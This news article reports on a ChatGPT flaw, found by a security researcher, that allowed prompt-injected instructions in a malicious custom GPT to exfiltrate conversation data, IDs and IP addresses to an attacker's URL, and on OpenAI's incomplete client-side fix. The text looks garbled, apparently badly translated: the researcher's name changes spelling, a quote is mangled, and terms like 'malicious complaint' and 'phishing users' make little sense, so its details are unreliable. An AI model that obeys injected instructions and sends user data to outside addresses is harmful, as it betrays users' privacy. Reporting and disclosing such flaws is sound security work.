OpenAI has rolled out an incomplete fix for a bug that allowed ChatGPT data to be extracted and conversation details possibly leaked to an external URL months after cybersecurity researchers discovered the flaw.
According to the researchers who discovered the flaw, the fix is incomplete as attackers can still exploit the flaw under certain circumstances.
The company has not yet implemented security controls in the ChatGPT iOS app, so risks to the platform remain unaddressed.
Security researcher Johan Ripperger discovered a technique to extract ChatGPT data and reported it to OpenAI in April 2023.
In November 2023, researchers published more information about the development of a malicious version of ChatGPT that exploited the vulnerability to attack phishing users.
“It notified OpenAI on November 13, 2023 about the creation of a malicious version of ChatGPT and its underlying instructions, and the company closed the report on November 15, deeming it impractical. “It seems best to make this information publicly available to raise awareness,” the researchers wrote.
After receiving no response from OpenAI, the researcher decided to make his findings public, detailing a malicious version of ChatGPT that potentially leaked conversation data to an external website address run by the researcher.
The flaw could leak data to external URLs if ChatGPT receives a malicious complaint, raising concerns about user privacy.
The attack requires the victim to send a malicious manifest that comes directly from the attacker or is published somewhere for the victim to discover and use.
The exposed data includes potential user conversations as well as metadata such as timestamps, user IDs, session IDs, and technical data such as IP addresses and user agent strings.
OpenAI responded to the situation by performing client-side verification by calling the verification API; To prevent images from dangerous URLs, Rehberger posted details about the bug on his blog.
“Because ChatGPT is not open source and the fix was not implemented through the content security policy, the specific details of the review are unclear,” Rehberger said.
The researchers noted that in some cases, ChatGPT still sends requests to random websites, so the attack can sometimes be effective even if inconsistencies are discovered when testing the website itself.
The exact reason for these discrepancies cannot be determined because the specific details of the controls that determine whether an external site address is secure are unclear.
The researchers point out that it is now difficult to exploit the vulnerability because the data transfer rate is limited and the data transfer process is slow.